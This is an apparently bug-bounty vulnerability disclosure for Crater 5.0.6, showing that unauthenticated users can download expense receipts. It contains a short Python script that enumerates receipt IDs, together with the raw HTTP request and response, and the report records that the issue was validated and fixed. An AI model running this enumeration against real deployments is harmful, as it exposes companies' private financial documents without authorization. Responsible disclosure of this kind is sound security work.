Improper Access Control in crater-invoice/crater

Valid

Reported on

Dec 29th 2021


Description

In recent Crater version (faf1ef09 tag: 5.0.6) I discovered, that not authenticated user can download all expense receipts uploaded to any company.

Proof of Concept

import requests

for i in range(1, 100):
    r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')

    if r.status_code == 200:
        print(f'Downloaded receipt for expense No.{i}')

Vulnerable request:

GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
Set-Cookie: 8XSG7KqTTKX6kx0xn1mEIE2dq4kSyWAoyIUaK8CF=eyJpdiI6IktHZDhvMUkzZG5nNndaNW9xM1hIZGc9PSIsInZhbHVlIjoiN1ZQaEhCekMwc1ZNTnRjbEVLamtqN0hSRHVSbFRJbnNpendEdis0RFNHM1B6NDdjZXl2WmhTMytOOUovTlNjaUo3UTZnbTlieS9GV0VaUk5CQjBmMTgrNEpwMFA1cUtybmVXQnl0QlN1bkxBZ0pSRDBad3JrSVA5VG5vV3I5WVlNWFVIWnFwTGxlYkdiZ1dyWmQ2Mmsxb0tvQW16dWE2K25hM0JvWnNSOFlyK1ZwWXNtM0o5VVVPbHdvNFlMbGFuVGJET01EY1A5TWVtbnJvaitKVHUvNEZNZ2JKbkhGVVBRakt5clBwenlsR0l1ei9zWTZLU25RenJ4aHdMaW1IWngvR091TTBZamRoQzU5OXlpZHVYMWJUNUpUV1oyaGNVclJHbElibHk1bDBFemU0QWR1RG9oNEtKTzdaVmF0ZHFsTnNsQmk5Y2J1eTR6S3VwRTJPLyt0NXFtOVE5ZlUrSWxQZWdRWWp3bGlNTzdVT2NvRHNiODcvMGlLbHJvQUwyZXpQOWJKTnpycDJoTkNCa2JNVzNNdz09IiwibWFjIjoiZDczM2UzMjdmNThiNjZlOTAyZTA5YjdiNGFjMmFjNGUxOTA4OWFmZDFiNzZhYjBjMzBlNDIxOGQxYWYxYTdmZSIsInRhZyI6IiJ9; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax

%PDF-1.4
%äüöß
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...

Impact

This vulnerability allows to download all receipts of expenses.

Occurrences

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 5 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 5 months ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. 5 months ago
Mohit Panjwani validated this vulnerability 5 months ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mohit Panjwani confirmed that a fix has been merged on dd324c 4 months ago
Mohit Panjwani has been awarded the fix bounty
web.php#L88 has been validated
to join this conversation